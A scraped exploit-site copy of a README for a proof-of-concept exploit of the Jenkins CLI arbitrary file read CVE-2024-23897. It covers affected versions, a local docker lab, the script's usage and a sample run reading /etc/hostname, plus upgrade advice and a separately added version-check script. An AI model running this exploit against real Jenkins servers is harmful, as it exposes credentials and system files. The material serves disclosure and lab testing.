## https://sploitus.com/exploit?id=5D31F81D-FA5D-54A4-AB47-1E44CDFB0608
# Jenkins CVE-2024-23897 PoC

A proof-of-concept (PoC) for CVE-2024-23897, an arbitrary file read vulnerability in Jenkins' built-in command line interface (CLI). It allows unauthenticated attackers with Overall/Read permission to read arbitrary files on the Jenkins controller file system.

**Affected Versions**

- Jenkins versions <= 2.441
- Jenkins LTS versions <= 2.426.2

## Set up a vulnerable instance

Spin up a local vulnerable instance using docker compose:

```bash
cd docker
docker compose up -d
```

The instance will be available at `http://localhost:1234`.

## Exploitation

```bash
โฏ python CVE-2024-23897.py --help
usage: CVE-2024-23897.py [-h] [--url URL] [--file FILE] [--method {1,2,3}]

Jenkins CVE-2024-23897 file-read PoC

options:
  -h, --help        show this help message and exit
  --url URL         URL for Jenkins instance (default: http://localhost:1234)
  --file FILE       File to read (default: /etc/hostname)
  --method {1,2,3}  The method to use [connect-node(1), who-am-i(2), or help(3)] (default: 1)
```

**Example**

```bash
โฏ python CVE-2024-23897.py --url 'http://127.0.0.1:1234/' --file '/etc/hostname'
[i] Vulnerable to CVE-2024-23897 (Jenkins v2.441 <= 2.441)
[*] Target URL http://127.0.0.1:1234/cli?remoting=false
[*] Attempting to read /etc/hostname
[i] Download request done
[+] Found data, printing...


ERROR: No such agent "jenkins_vuln_instance" exists.

[i] Upload request done
[i] All threads completed
```

The script may have issues reading larger files due to concurrency and connection timeouts. For more technical details and a walkthrough of the vulnerability, take a look at my [blog post on the topic](https://abraxas.pages.dev/blog/cve-2024-23897/).

## Fix

- Upgrade to Jenkins 2.442 or LTS 2.426.3
- Apply temporary workarounds as described in the [Jenkins security advisory](https://www.jenkins.io/security/advisory/2024-01-24/).
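An added example, not part of this PoC repository: a version check against the affected and fixed releases listed above, of the kind an inventory or patch-audit script would run. It assumes the version string comes from the `X-Jenkins` response header that Jenkins sends (the sample header value below is constructed).

```python
# Added example, not part of the PoC: classify a Jenkins version against the
# affected ranges for CVE-2024-23897 (weekly <= 2.441, LTS <= 2.426.2) and the
# first fixed releases (weekly 2.442, LTS 2.426.3).
import re

WEEKLY_FIXED = (2, 442)    # first fixed weekly release
LTS_FIXED = (2, 426, 3)    # first fixed LTS release


def parse_version(text):
    """Return the numeric components of a Jenkins version string as a tuple.

    Accepts trailing suffixes such as '-rc' or '.1-SNAPSHOT' (only the leading
    dotted numbers are compared).
    """
    m = re.match(r"\s*(\d+(?:\.\d+)*)", text)
    if not m:
        raise ValueError(f"not a Jenkins version: {text!r}")
    return tuple(int(p) for p in m.group(1).split("."))


def is_lts(version):
    """LTS releases carry three components (2.426.2); weeklies carry two (2.441)."""
    return len(version) >= 3


def is_affected(version_text):
    """True when the version lies in the affected range for CVE-2024-23897.

    Note: a version in range only says the code is affected; it does not tell
    whether the CLI has been disabled as a temporary workaround.
    """
    version = parse_version(version_text)
    fixed = LTS_FIXED if is_lts(version) else WEEKLY_FIXED
    return version < fixed


def classify_header(header_value):
    """Classify an X-Jenkins header value: returns 'affected' or 'fixed'."""
    return "affected" if is_affected(header_value) else "fixed"


if __name__ == "__main__":
    # Constructed sample header value, matching the version the PoC output reports.
    sample_x_jenkins = "2.441"
    print(f"X-Jenkins: {sample_x_jenkins} -> {classify_header(sample_x_jenkins)}")
```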

## Related Links

- [Sonar Source | Excessive Expansion: Uncovering Critical Security Vulnerabilities in Jenkins](https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/)
- [Jenkins Security Advisory - 2024-01-24](https://www.jenkins.io/security/advisory/2024-01-24/#binary-files-note)
- [Qualys ThreatPROTECT | Jenkins Core Remote Code Execution Vulnerability (CVE-2024-23897)](https://threatprotect.qualys.com/2024/01/29/jenkins-core-remote-code-execution-vulnerability-cve-2024-23897/)
- [CVE-2024-23897: Assessing the Impact of the Jenkins Arbitrary File Leak Vulnerability – Horizon3.ai](https://www.horizon3.ai/cve-2024-23897-assessing-the-impact-of-the-jenkins-arbitrary-file-leak-vulnerability/)